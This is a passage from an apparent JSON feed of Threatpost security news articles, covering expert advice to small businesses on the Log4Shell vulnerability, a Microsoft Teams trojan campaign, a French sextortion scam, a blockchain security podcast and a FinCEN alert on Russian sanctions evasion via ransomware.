library is included in widely deployed Apache products including Struts 2, Solr, Druid, Flink and Swift. 
SMBs that have built applications with these products should conduct a code audit to determine if the vulnerable version of log4j is in use._\n\n**Mitiga\u2019s Maor:** SMBs should set up an immediate task force to map all affected homegrown systems and patch them, while allowing IT to map all external systems and communicate with the censored systems.\n\n**Anchore\u2019s Bressers: **This vulnerability is going to be especially challenging for small and medium business users without a dedicated security team. Ideally software vendors are being proactive in their investigations and updates and are contacting affected customers, but this is not always the case.\n\nDepending on the level of technical acumen an organization has, there are steps that can be taken to detect and resolve the issue themselves. There are various open-source tools that exist to help detect this vulnerability on systems such as [Syft and Grype](<https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html>). CISA has [released guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) regarding this vulnerability, including steps a business can take.\n\n**Lacework\u2019s Nunnikhoven: **\u201cWhile IT knowledge is required, the basic steps don\u2019t require a security team. IT teams should be trying to find systems that use log4j in their environment and then apply one of the techniques the fantastic team of volunteers with the log4j project have published or the recommended guidance from that system\u2019s vendors. 
This is a lot of work but it\u2019s necessary to reduce the risk to your business.\n\n_The log4j team\u2019s resource is [available here](<https://logging.apache.org/log4j/2.x/security.html>), in the mitigation section under the \u201cFixed in Log4j 2.15.0\u201d heading._ _Many organizations have also published free tools to help identify vulnerable applications, [like this one](<https://about.sourcegraph.com/blog/log4j-log4shell-0-day/>), [this one](<https://log4j-tester.trendmicro.com/>) or [this one](<https://github.com/hillu/local-log4j-vuln-scanner>)._\n\n**Invicti\u2019s Adam Goodman: **It\u2019s a nightmare of a problem if you have a surplus of Java applications deployed everywhere, not just on the primary website. Organizations should immediately determine where and how they directly or indirectly use this library and then take steps to mitigate the vulnerability by either upgrading the library or modifying Java system properties to disable the vulnerable functionality.\n\nAim to ensure that all applications have limited outbound internet connectivity, and use Ansible scripts or adequate security tools to scan _en masse_ for the vulnerability before forcibly patching it. It\u2019s crucial to use security tools that target all of the applications they can find so that organizations have a more accurate window into their security posture.\n\nOrganizations that lack sufficient budget to invest in discovery tools should make a list of Java applications which they add to continually, and check them off, while prioritizing apps that present the most risk if exploited.\n\n## What Happens if an SMB Uses an MSP?\n\n**Anchore\u2019s Bressers: **I would expect an MSP to take the lead on this issue for their customers. An MSP should be monitoring their infrastructure for indicators of compromise, applying workarounds when possible, and updating the managed applications as vendor updates become available. 
Any business using MSP services should reach out to their provider and request a status update on Log4Shell.\n\n**Ryan Weeks, CISO at Datto:** Cyber-threats are always prevalent. Especially for small to medium-sized businesses (SMBs) \u2013 [78 percent](<https://www.datto.com/resources/dattos-2020-global-state-of-the-channel-ransomware-report>) of MSPs reported attacks against their client SMBs in the last two years alone. MSPs have a responsibility to diligently check for vulnerabilities and arm their customers with the tools to combat them. It\u2019s not enough to simply install routine software updates. SMBs need to ensure their partners proactively push out security updates for any affected products, and continually monitor for potential exploits.\n\n**Invicti\u2019s Adam Goodman: **This is an issue front-and-center in the security community and if an organization is using an MSP, it\u2019s highly likely that MSP is actively working on this. Confirm that a ticket and incident is open for this vulnerability, and ask the MSP for a list of managed applications that are under remediation. It\u2019s vital to review that list of apps for anything that\u2019s missing, including any back-office or forgotten tools in the mix. Ensure the MSP has visibility into the attack surface so that you both can better handle necessary containment steps moving forward.\n\n**Lacework\u2019s Nunnikhoven: **A managed service provider can help update and fix the systems they manage. A managed security service provider can help detect and stop attacks aimed at this issue, and help investigate any attacks that may have already taken place. The first step in both cases is speaking with your MSP/MSSP to understand the steps they are taking to help protect their customers.\n\n## What Applications Should SMBs Worry About?\n\n**Mitiga\u2019s Maor:** Impact can vary significantly as many custom-developed and off-the-shelf products are impacted. 
Many adversaries are using the vulnerability as part of mass-scanning efforts to identify vulnerable systems. Likewise, some known malware strains have already incorporated exploitation of this vulnerability into their spreading mechanisms. Any Java application might be affected.\n\n**Invicti\u2019s Adam Goodman: **SMBs should address worries and concerns based on business risk. Internet-facing apps should receive immediate priority, followed by applications that are critical to the software supply chain or back-office and financial applications. There is also an excellent effort from the security community to compile all affected technologies, [it can be found here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>).\n\n**ESET\u2019s L\u00e9veill\u00e9: **As a first step, SMBs should ask questions of the organization providing their internet-facing services such as their website. Then they should see if any of their applications use log4j to generate logs. Java applications and webservices would be the first to look at because log4j is a Java library.\n\n**Cybereason\u2019s Striem-Amit:** The world of Java and open source has so many dependencies, where a company might use one product, but it actually carries with it a dozen other libraries. So log4j could be present even though a company might not necessarily even be aware or \u2026 done it directly. So the scanning and the analysis is severely complex. And you have to go in each one of your servers and see, are we using log4j either directly or indirectly in that environment.\n\n## How Can SMBs Remediate a Successful Log4Shell Attack?\n\n**Mitiga\u2019s Maor:** Thankfully, there\u2019s a lot that can be done to harden environments. For customers with internally developed applications, limiting outbound internet connections from servers to only whitelisted hosts is a great step, if challenging to implement. 
Likewise, a variety of cybersecurity companies have listed steps that can be taken to harden vulnerable versions of log4j if upgrades can\u2019t be performed readily. Similarly, exploitation of this vulnerability and many others can be caught using typical compromise assessment techniques. It pays to threat hunt! Remediation is no different than recovering from any other type of RCE vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **Remediation of this issue will depend on where you find log4j. If it\u2019s in something you\u2019ve written, you can update the library or turn off the vulnerable feature. For commercial software and services, you\u2019re reliant on the vendor to resolve the issue. While that work is ongoing, monitoring your network for attack attempts is reasonably straightforward\u2026if you have the security controls in place.\n\nLacework Labs has published [a detailed technical post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) on some of the attack techniques currently in use. Expect more variants as cybercriminals develop more techniques to avoid various security controls and other mitigation.\n\nIn situations like this it\u2019s important to understand that until the root cause has been resolved (log4j updated or the feature in question turned off), attackers will continue to work to evade any mitigations that defenders put in place to stop them.\n\n**Anchore\u2019s Bressers: **An organization without an incident-management team on staff should reach out to an incident-management consulting group. There are a number of important steps that should happen when investigating any cybersecurity attack, successful or not, that can require preserving evidence, recovering data, and protecting employees and users. This is a serious vulnerability with serious consequences. 
It\u2019s one of the worst we have seen in recent history because of its ease of exploitability, far-reaching impacts and powerful nature.\n\n## Final Thoughts\n\n**Datto\u2019s Weeks:** Scenarios such as the log4j vulnerability underscore the importance of proactivity in security. While many are now scrambling to address the vulnerability with patches, it\u2019s equally important to plan for subsequent attacks. Fortunately, there are solutions that can apply known workarounds for vulnerable instances.\n\n**HackerOne\u2019s Ockers: **As a best practice, I recommend all businesses have a clear understanding of the software used within their own systems. Even more important for SMBs in this instance \u2014 businesses should also have a clear understanding of the licensing agreements and security policies of any software vendors or service providers. This level of visibility lets security and IT teams quickly understand where they\u2019re at risk if, and when, something like this is exploited.\n\n**ESET\u2019s L\u00e9veill\u00e9: **SMBs should verify if there were any successful attempts to exploit the vulnerability by looking at their logs.\n\n**HackerOne\u2019s Ockers: **SMBs and larger organizations alike will be affected. As we\u2019re seeing, exploitation will continue to be widespread \u2013 this means it\u2019s particularly important that SMBs check if vendors are still using the vulnerable version of log4j to process user-controlled or otherwise untrusted data. And, if so, SMBs should also ask vendors if their data is stored or processed in the same exposed environment.\n\n**Cybereason\u2019s Striem-Amit:** I think at the end of the day, really prioritize the most internet-facing environments, and rely on your service providers as much as they can to assist you with other patching. You\u2019re welcome to use [our vaccine](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) to buy time. 
It does work remarkably well to make sure that, between now and when you actually end up patching the server, you\u2019re kind of secure.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T17:54:47", "type": "threatpost", "title": "What the Log4Shell Bug Means for SMBs: Experts Weigh In", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T17:54:47", "id": "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "href": "https://threatpost.com/log4shell-bug-smbs-experts/177021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:44", "description": "Threat actors are targeting Microsoft Teams users by planting malicious executables in chat threads that drop Trojans which ultimately can take over end-user machines, researchers have found.\n\nIn January, researchers at Avanan, a Check Point Company, began tracking the campaign, which drops malicious executable files in Teams conversations that, when clicked on, eventually take over the user\u2019s computer, according to [a report](<https://www.avanan.com/blog/hackers-attach-malicious-.exe-files-to-teams-conversations>) published Thursday.\n\n\u201cUsing an executable file, or a file that contains instructions for the system to execute, hackers can install DLL files and allow the program to self-administer and take control over the computer,\u201d Jeremy Fuchs, cybersecurity researcher and analyst at Avanan, wrote in the report. 
\u201cBy attaching the file to a Teams attack, hackers have found a new way to easily target millions of users.\u201d\n\nCybercriminals have long targeted Microsoft\u2019s ubiquitous document-creation and sharing suite \u2013 the legacy Office and its cloud-based version, [Office 365](<https://threatpost.com/tiny-font-size-email-filters-bec-phishing/176198/>) \u2013 with attacks against individual apps in the suite such as [PowerPoint](<https://threatpost.com/powerpoint-abused-take-over-computers/178182/>) as well as [business email compromise](<https://threatpost.com/microsoft-365-bec-innovation/163508/>) and other scams.\n\nNow Microsoft Teams \u2013 a business communication and collaboration suite \u2013 is emerging as an [increasingly popular attack surface](<https://threatpost.com/microsoft-teams-phishing-office-365/160458/>) for cybercriminals, Fuchs said.\n\nThis interest could be attributed to its surge in use over the COVID-19 pandemic, as many organizations\u2019 employees working remotely relied on the app to collaborate. Indeed, the number of daily active users of Teams nearly doubled over the past year, increasing from 75 million users in April 2020 to 145 million as of the second quarter of 2021, according to Statista.\n\nThe latest campaign against Teams demonstrates an increased understanding of the collaboration app that will allow attacks against it to increase in both sophistication and volume, Fuchs noted. \u201cAs Teams usage continues to increase, Avanan expects a significant increase in these sorts of attacks,\u201d he wrote.\n\n## **Taking on Teams**\n\nIn order to plant malicious files in Teams, attackers first have to get access to the application, Fuchs noted. 
This is possible in a number of ways, typically involving an initial [email compromise](<https://threatpost.com/microsoft-teams-tabs-bec/166909/>) through phishing to gain credentials or other access to a network, he said.\n\n\u201cThey can compromise a partner organization and listen in on inter-organizational chats,\u201d Fuchs wrote. \u201cThey can compromise an email address and use that to access Teams. They can steal Microsoft 365 credentials, giving them carte blanche access to Teams and the rest of the Office suite.\u201d\n\nOnce an attacker gains access to Teams, it\u2019s fairly easy to navigate and slip past any security protections, he noted. This is because \u201cdefault Teams protections are lacking, as scanning for malicious links and files is limited,\u201d and \u201cmany email security solutions do not offer robust protection for Teams,\u201d Fuchs wrote.\n\nAnother reason Teams is easy for hackers to compromise is that end users inherently trust the platform, sharing sensitive and even confidential data with abandon while using it, he said.\n\n\u201cFor example, an Avanan analysis of hospitals that use Teams found that doctors share patient medical information practically with no limits on the Teams platform,\u201d Fuchs wrote. \u201cMedical staff generally know the security rules and risk of sharing information via email, but ignore those when it comes to Teams. 
In their mind, everything can be sent on Teams.\u201d\n\nFurther, nearly every Teams user can invite people from other departments or other companies to collaborate via the platform, and there is often \u201cminimal oversight\u201d over these requests because of the trust people have, he added.\n\n## **Specific Attack Vector**\n\nIn the attack vector Avanan researchers observed, attackers first access Teams through one of the aforementioned ways, such as a phishing email that spoofs a user, or through a lateral attack on the network.\n\nThen, the threat actor attaches a .exe file to a chat \u2013 called \u201cUser Centric\u201d \u2013 that is actually a trojan. To the end user, it looks legitimate, because it appears to be coming from a trusted user.\n\n\u201cWhen someone attaches a file to a Teams chat, particularly with the innocuous-sounding file name of \u2018User Centric,\u2019 many users won\u2019t think twice and will click on it,\u201d Fuchs wrote.\n\nIf that happens, the executable will then install DLL files that install malware as a Windows program and create shortcut links to self-administer on the victim\u2019s machine, he said. 
The ultimate goal of the malware is to take over control of the machine and perform other nefarious activities.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T14:11:48", "type": "threatpost", "title": "Microsoft Teams Targeted With Takeover Trojans", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T14:11:48", "id": "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "href": "https://threatpost.com/microsoft-teams-targeted-takeover-trojans/178497/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T17:30:25", "description": "A new French-language [sextortion campaign](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>) is making the rounds, researchers warn.\n\nAs noted by Sophos researchers in a Monday [report](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>), sextortion is one of the oldest tricks in the book, but its popularity has waned in recent years due to effective 
cybersecurity, law enforcement crackdowns and the rise of ransomware.\n\nThis new campaign is one signal of what may be a resurgence, they said.\n\n## Threats Sandwich Malware Links\n\nThe new French-language attack entails a blind email blast, shown below, with unsubstantiated claims of video evidence and so on. It cites France\u2019s legal penalties for watching illegal pornography, then tells the reader: \u201cIf you wish, you may reply to the address below to explain away your actions, so that we can evaluate your explanation and determine if charges should be brought. You have a strict deadline of 72 hours.\u201d\n\nShould the reader not comply, \u201cwe will are [sic] obliged to send our report to the Public Prosecutor to issue an arrest warrant against you. We will proceed to have you arrested by the police closest to your place of residence.\u201d\n\nNotably, the malicious email contains no plaintext or hyperlinks. Instead, its text is displayed in an image file.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/23114449/French-sextortion-threat-email-e1645634734663.png>)\n\nFrench-language sextortion threat email. Source: Sophos.\n\nAttackers use hyperlinks to trick unwitting victims into downloading malware or visiting malicious webpages. 
As Sophos explains, \u201cAdding an image that holds the call-to-action text obviously makes it harder for a recipient to reply, because a plain image can\u2019t contain clickable links, or even text that can be copied and pasted.\u201d\n\nBut, as Mike Parkin \u2013 senior technical engineer at Vulcan Cyber \u2013 told Threatpost via email, \u201cThe fact that most scams end up in our junk mail folder shows how effective email filters have become, which is why they look to alternative methods like embedded PDFs or images rather than raw text or HTML that is easy for the filters to analyze.\u201d\n\n## What is Sextortion?\n\nSextortion is a form of blackmail in which a malicious actor claims to possess evidence of sexual misbehavior from their victim. The attacker demands payment in exchange for not spreading the compromising information or images.\n\nSometimes, these campaigns can combine with [botnets](<https://threatpost.com/phorpiex-botnet-shifts-ransomware-sextortion/149295/>), [ransomware](<https://threatpost.com/sextortion-emails-force-payment-via-gandcrab-ransomware/139753/>) and other methods of cyber attack to form a potent cocktail. However, as [prior](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) [attacks](<https://threatpost.com/sextortionists-defenses-cryptocurrency-shift/148967/>) have shown, sextortion tends to be rudimentary: Such attacks aren\u2019t targeted. Rather, they entail blind email blasts that prey on victims\u2019 fear, without any actual evidence of sexual impropriety to back them up.\n\n## Sextortion is on the Rise Again\n\n\u201cScams seem to run in cycles,\u201d notes Parkin. \u201cWhether it\u2019s a Prince from Nigeria, uncollected assets, scam victim compensation, extortion over adult websites you didn\u2019t visit, or whatever. Scammers will use one for a while, then shift to something else when they stop getting responses. 
Eventually, they\u2019ll circle back to an old scam that may have been updated with new text or a new graphic.\u201d\n\nLionel Sigal, CTI at CYE, told Threatpost via email that sextortion has recently been skyrocketing; \u201cSextortion attempts (real and fake) targeting executives of organizations have increased by 800% in the last 4 months,\u201d he said.\n\nCampaigns targeting ordinary individuals are also spiking: The FBI\u2019s Internet Crime Complaint Center received more than [16,000 sextortion complaints](<https://www.ic3.gov/Media/Y2021/PSA210902>) in only the first seven months of 2021.\n\nWill this old-hat method of cyber attack prove effective? \u201cIt\u2019s too early to tell what the hit rate is on this technique,\u201d Casey Ellis, Founder and CTO of Bugcrowd, told Threatpost via email, \u201cbut it feels to me like a pivot that people would fall for. If a scam has a take of $500 and it costs 1 cent to send an email, you only have to connect 1 in 50,000 times for the scam to break even.\u201d\n\nTo Parkin, \u201cthe best defense is solid user education. No matter how successful an attacker is at getting past the filters, their attack can only succeed if the target falls for it and takes the bait.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. 
[REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-23T17:20:41", "type": "threatpost", "title": "Sextortion Rears Its Ugly Head Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-23T17:20:41", "id": "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "href": "https://threatpost.com/sextortion-rears-its-ugly-head-again/178595/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-31T14:20:09", "description": "Why in the world would a collection of nonfungible token (NFT) gorilla avatars called the Bored Ape Yacht Club (BAYC), run by 30-somethings using aliases like \u201cEmperor Tomato Ketchup\u201d and \u201cNo Sass\u201d and [adored by celebrities](<https://www.vanityfair.com/news/2022/02/bored-ape-yacht-club-revealed>), spiral on up to a [multibillion-dollar 
valuation](<https://www.coingecko.com/en/nft/bored-ape-yacht-club>) (\u2026and, by the way, how can you yourself get stinking crypto-rich?!)?\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30153635/Bored-Ape-Yacht-Club-NFT-scaled-e1648669046321.jpeg>)\n\nImage of Bored Ape Yacht Club NFT.\n\nIf you don\u2019t have a clue, you might be one of the crypto-newbies for whom the New York Times recently pulled together its [Latecomer\u2019s Guide to Crypto](<https://www.nytimes.com/interactive/2022/03/18/technology/cryptocurrency-crypto-guide.html>) and whom [mutual funds companies](<https://www.fidelity.com/viewpoints/active-investor/beyond-bitcoin>) are trying to [ease into](<https://economictimes.indiatimes.com/markets/cryptocurrency/crypto-investment-in-mutual-funds-style-mudrex-launches-coin-sets/articleshow/87099763.cms?from=mdr>) the brave new world.\n\nYou also might have a thousand questions that go beyond cartoon apes and get into the nitty-gritty of how cryptocurrency and blockchain technologies work and how to sidestep the associated cybersecurity risks.\n\nThose risks are big, throbbing realities. 
The latest: Ronin, an Ethereum-linked blockchain platform for NFT-based video game Axie Infinity, on Tuesday put up a [blog post](<https://roninblockchain.substack.com/p/community-alert-ronin-validators?s=w>) advising that 173,600 ether tokens and 25.5 million USD coins \u2013 valued at nearly $620 million as of Tuesday \u2013 had been drained from its platform after an attacker used hacked private keys to forge two fake withdrawals last week.\n\nAccording to [Forbes](<https://www.forbes.com/sites/jonathanponciano/2022/03/29/second-biggest-crypto-hack-ever-600-million-in-ethereum-stolen-from-nft-gaming-blockchain/?sh=280f0f0c2686>), blockchain analytics firm Elliptic pegs it as the second-biggest hack ever.\n\n## New Technology, Old Hacks\n\nCryptocurrency and related technologies may be shiny new concepts, but the techniques crooks are using to drain them aren\u2019t necessarily newfangled. As of its Wednesday update, Ronin said that it looks like the breach was pulled off with old-as-the-hills social engineering:\n\n> \u201cWhile the investigations are ongoing, at this point we are certain that this was an external breach. All evidence points to this attack being socially engineered, rather than a technical flaw.\u201d \u20143/30/22 Ronin alert.\n\nDr. 
Lydia Kostopoulos, senior vice president of emerging tech insights at [KnowBe4](<https://www.knowbe4.com/>), stopped by the Threatpost podcast to give us an overview of this brave new world of blockchain: a landscape of new technologies that are making wallets swell and shrink and hearts to flutter in dismay when such things as the Ronin hack transpire.\n\nShe shared her insights into everything from how such technologies work to what the associated cybersecurity risks are, including:\n\n * How blockchain technologies, including NFTs, work.\n * The cybersecurity risks that might emerge from the use of NFTs/cryptocurrency, including popular scams/social engineering attempts circulating today.\n * Steps individuals/businesses can take to protect themselves.\n * What is driving their popularity and if NFTs are here to stay.\n * Regulations on blockchain technology.\n\nYou\u2019ve heard it a thousand times before, but Dr. Kostopoulos says it\u2019s real: Blockchain technology is transformative. Look out for state-backed currencies and blockchain-enabled voting that can\u2019t be tampered with, for starters. Look for NFT invitations to artists\u2019 performances that keep giving as those artists reward their ticket holders with future swag. And for the love of Pete, don\u2019t lose your cold wallets if you want to keep your crypto safe.\n\nIf you don\u2019t yet know what a cold wallet is, definitely have a listen!\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/032522_KnowBe4_Lydia_mixdown_2.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-31T13:00:09", "type": "threatpost", "title": "A Blockchain Primer and Bored Ape Headscratcher \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-31T13:00:09", "id": "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "href": "https://threatpost.com/a-blockchain-primer-and-a-bored-ape-headscratcher-podcast/179179/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T15:23:28", "description": "Russia may ramp up ransomware attacks against the United States as a way to ease the financial hurt it\u2019s under due to sanctions, U.S. 
federal authorities are warning. Those sanctions have been levied against the nation and Vladimir Putin\u2019s government due to its invasion of Ukraine.\n\nThe Financial Crimes Enforcement Network (FinCEN) issued a FinCEN Alert [(PDF)](<https://www.fincen.gov/sites/default/files/2022-03/FinCEN%20Alert%20Russian%20Sanctions%20Evasion%20FINAL%20508.pdf>) on Wednesday advising all financial institutions to remain vigilant against potential efforts to evade the expansive sanctions and other U.S.-imposed restrictions related to the current conflict. One way this may be done is to move cryptocurrency funds through ransomware payments collected after Russian state-sponsored actors carry out cyberattacks.\n\n\u201cIn the face of mounting economic pressure on Russia, it is vitally important for U.S. financial institutions to be vigilant about potential Russian sanctions evasion, including by both state actors and oligarchs,\u201d said FinCEN Acting Director Him Das [in a press statement.](<https://www.fincen.gov/news/news-releases/fincen-provides-financial-institutions-red-flags-potential-russian-sanctions>)\n\nFinancial actions taken against Russia by the U.S. Department of the Treasury\u2019s Office of Foreign Assets Control (OFAC) since the nation\u2019s invasion of Ukraine last month are numerous. 
They include:\n\n * Sanctions against persons who have financial operations in the Russian Federation, including Putin and Russia\u2019s Minister of Foreign Affairs Sergei Lavrov\n * Prohibitions on correspondent or payable-through account and payment processing and blocking of certain Russian financial institutions\n * Prohibitions related to new debt and equity for certain Russian entities\n * A prohibition on transactions involving certain Russian government entities, including the Central Bank of the Russian Federation.\n\nFinCEN now is urging financial institutions \u2013 including those with visibility into cryptocurrency or convertible virtual currency (CVC) flows, such as CVC exchangers and administrators \u2013 to identify and report suspicious activity associated with potential sanctions evasion quickly and conduct an investigation where appropriate.\n\nSo far FinCEN has not seen widespread evasion of sanctions using methods such as cryptocurrency, Das noted. However, \u201cprompt reporting of suspicious activity\u201d can ensure this remains the case to support U.S. 
efforts and interest in supporting Ukraine.\n\n## **Ramp-Up in Cyber-Attacks**\n\nIndeed, Russian state-sponsored actors already have ramped up cyber-attacks since the beginning of the conflict in the Ukraine; thus, an increase in ransomware activity is not an entirely unlikely prospect.\n\nResearchers at Google\u2019s Threat Analysis Group (TAG) [reported earlier this week](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) that they had observed advanced persistent threat (APT) groups affiliated with or backing Vladimir Putin\u2019s government stepping up phishing attacks against Ukrainian and European targets, as well as distributed denial-of-service (DDoS) attacks against key government and service-oriented Ukrainian websites.\n\nBecause it is not regulated by typical financial currency laws in the United States, cryptocurrency has become a method of choice for cybercriminals to conduct transactions \u2013 including receiving payouts after ransomware attacks. For this reason, it also could be used by Russia to get around U.S. 
sanctions, noted one security professional.\n\n\u201cFor the tech savvy or oligarch with a need to move money, they can hire the talent to move the transactions,\u201d Rosa Smothers, senior vice president of cyber operations at security firm [KnowBe4](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkOYxa_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8IRiPIGKWMahkivu0WTh5PX5dG77IJVWKxIQtQJVv-2BIYuYvpXdvb7-2BNsZCUHkZXL7ec2QLTY2-2FTBe03G8iVYPixd8Bov5GgH6DAKHGUqexQ-2B0nAYVFKMqkBKYw8YYPqfJNrlxOwOTBqCCKReqy6Kmv5Y9-2FNHt4zLkJVstDtTRBPXtmuX1dxVZT3q5fhWHsXeqv-2Fv1cJIX-2Fjlb-2FKnRhdADS-2BgZa5auC32i8V3U0ThbubhxXsqpIt03Hz1cjPy4L3tEOEdvhmz3jLvNd846SsHu-2Fk-3D>) and a former CIA cyber threat analyst and technical intelligence officer, observed in an email to Threatpost.\n\nHowever, while cryptocurrency does provide privacy for storage and process transactions, \u201cthe transparency provided by blockchain could make the movement of large amounts of cryptocurrency detectable by law enforcement,\u201d she noted, citing how the Department of Justice was able to [seize millions of dollars in Bitcoin](<https://threatpost.com/fbi-claws-back-millions-darksides-ransom/166705/>) that Colonial Pipeline paid to the DarkSide group after [a highly disruptive ransomware attack](<https://threatpost.com/pipeline-crippled-ransomware/165963/>) last May.\n\nIndeed, another security professional expressed doubt that Russia could use ransomware payments or any other type of cryptocurrency transactions to 